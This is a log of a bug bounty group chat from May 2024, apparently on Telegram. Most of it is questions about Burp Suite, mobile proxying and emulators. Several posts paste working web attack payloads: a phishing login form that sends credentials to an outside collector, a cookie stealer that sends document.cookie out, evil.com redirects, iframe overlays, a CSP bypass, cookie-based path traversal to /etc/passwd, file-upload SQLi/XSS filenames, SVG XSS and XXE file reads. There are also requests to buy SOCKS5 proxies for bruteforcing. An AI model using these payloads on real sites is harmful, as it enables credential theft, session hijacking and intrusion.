Bug bounty chat

14 May 2024 15:42

On my target.
I logout then intercept with Burpsuite then send to repeater and dropped the proxy.
I clear all the cookies in the request form then I generated PoC. I click on the PoC HTML file then it load then I got logout from my account.

Csrf vulnerability?

Bug bounty chat

13 May 2024 09:24

<A HREF="http://evil.com/">Login Here </A>

<script>document.location.href="http://evil.com"</script>

<h3>Please login to proceed</h3> <form action=http://abp16yqa8m56p2kznk76xvmnqew5kwakz.oastify.com>Username:<br><input type="username" name="username"></br>Password:<br><input type="password" name="password"></br><br><input type="submit" value="Login"></br>

csp bypass:
<script>alert(1)</script>&token=;script-src-elem 'unsafe-inline'

iframe:
"><iframe src="https://nasa.gov" style="border: 0; position:fixed; top:0; left:0; right:0; bottom:0; width:100%; height:100%">

<IFRAME SRC="javascript:alert(document.cookie);"></iframe>

cookie stealer:
<script>document.location='http://sb7j6gqs845opkkhn27oxdm5qwwnks8h.oastify.com?c='+document.cookie&lt;/script&gt;

<script>new Image().src="http://localhost/cookie.php?c="+document.cookie</script>

<script>document.body.background=”https://www.jhadol.com/images/photos/original/1465212129eukl.jpg“;</script>

<script>window.location=”https://coffinxp.000webhostapp.com/coffinxp1.html”;</script>

<script>document.body.bgColor=”red”;</script>

Bug bounty chat

13 May 2024 05:22

# Google Dork: "index of" "user.MYD" # Title: Disclosure of sensitive files. # Date: 15/08/2020 # Author: Sahil Saxena # LinkedIn: https://www.linkedin.com/in/sahil-saxena-1333b9174 # Twitter: https://twitter.com/Sahil_delinitor # GitHub: https://github.com/Sahil-69 # Bugcrowd: https://bugcrowd.com/Prickn Thanks, Sahil Saxena

Bug bounty chat

12 May 2024 19:39

what exectly u need to scrap?

Bug bounty chat

12 May 2024 19:35

scrapiing do like a grep? with curl?!

Bug bounty chat

12 May 2024 18:12

do you know any website where i can get it

Bug bounty chat

12 May 2024 18:01

а нафига они тебе? есть сайты с подпиской на пачки socks.. либо намути сам теми же сплоентами )

Bug bounty chat

12 May 2024 07:51

Hello everyone, this is a new information gathering bot, where you get all the information via email, phone number, username and more. Please do check and give a feedback


@Cipherinfo_bot

Bug bounty chat

11 May 2024 14:21

Sign of attack in APK

Bug bounty chat

10 May 2024 18:30

Nginx is blocking %00
Any bypass?

Bug bounty chat

07 May 2024 20:56

If there are any resources or material one could use please do share

Bug bounty chat

07 May 2024 20:54

Thanks but the genymotion I'm seeing is a paid version and the free is hard to setup on my pc

Bug bounty chat

05 May 2024 07:49

any apple product security researchers

Bug bounty chat

04 May 2024 17:31

Hello please Does anyone know who to proxy a mobile by it's wifi hotspot through burpsuite

Bug bounty chat

04 May 2024 11:38

Anybody here know about nuclei headless template

Bug bounty chat

13 May 2024 13:40

Has anyone ever heard of rudder encryption or seen it a request form

Bug bounty chat

13 May 2024 05:22

How to find local file read vulnerabilities based on cookies.

Request
GET /vulnerable.php HTTP/1.1
Cookie:usid=../../../../../../../../../../../../../etc/pasdwd

Response
HTTP/1.1 200 OK
...
Server: Apache root:fi3sER6:0:1:System Operator:/:/bin/ksh//

#bugbounty #bugbountytip

Bug bounty chat

13 May 2024 00:47

👋 Hello,
While checking my target. I saw a url ending with config-apim.json.
It contains a client Id, clientlibrary and login.window.net.

What do you think?

Bug bounty chat

12 May 2024 19:39

On burps or terminal .. so it's gonna grep all the page?

Bug bounty chat

12 May 2024 19:33

Can I scrape any website using burps??

Bug bounty chat

12 May 2024 18:01

под блеч, или под антиблокировки, или под брут?

Bug bounty chat

12 May 2024 17:48

Please hackers
Where can I buy good Socks5

Bug bounty chat

12 May 2024 01:16

https://medium.com/bugbountywriteup/my-hunt-discovering-microsoft-bugs-f6a9c790bec0

Bug bounty chat

10 May 2024 20:31

https://youtu.be/7IAGUD7By0c?si=kOHtzQ_OiYfP6hbc

Bug bounty chat

07 May 2024 22:47

When downloading you have to select the option that says personal use
Genymotion is free

Bug bounty chat

07 May 2024 20:55

However though I don't know much about this Frida or how to use it

Bug bounty chat

07 May 2024 12:17

I faced thesame thing sometime ago
So I just used genymotion emulator and frida

Bug bounty chat

04 May 2024 17:32

Let me explain it in more details I'm trying to proxy my phone through burpsuite and I can't cause I don't have a wifi Instead I'm using my phone's WiFi hotspot

Bug bounty chat

04 May 2024 11:38

Ever you create any headless template for you

Bug bounty chat

04 May 2024 09:11

🖥Chaining Vulnerabilities through File Upload🖥

SLQi⏳

'sleep(20).jpg
sleep(25)-- -.jpg

../../etc/passwd/logo.png
../../../logo.png

->  Set file name filename="svg onload=alert(document.domain)>" , filename="58832_300x300.jpg<svg onload=confirm()>"

->  Upload using .gif file
GIF89a/<svg/onload=alert(1)>/=alert(document.domain)//;

-> Upload using .svg file
<svg xmlns="w3.org/2000/svg" onload="alert(1)"/>

-> <?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "w3.org/Graphics/SVG/1…"><svg version="1.1" baseProfile="full" xmlns="w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("HolyBugx XSS");
   </script>
</svg>

<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='attacker.com'"
xmlns="w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</svg>
</code>

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="500px" height="500px" xmlns="w3.org/2000/svg" xmlns:xlink="w3.org/1999/xlink" version="1.1
<text font-size="40" x="0" y="16">&xxe;</text>
</svg>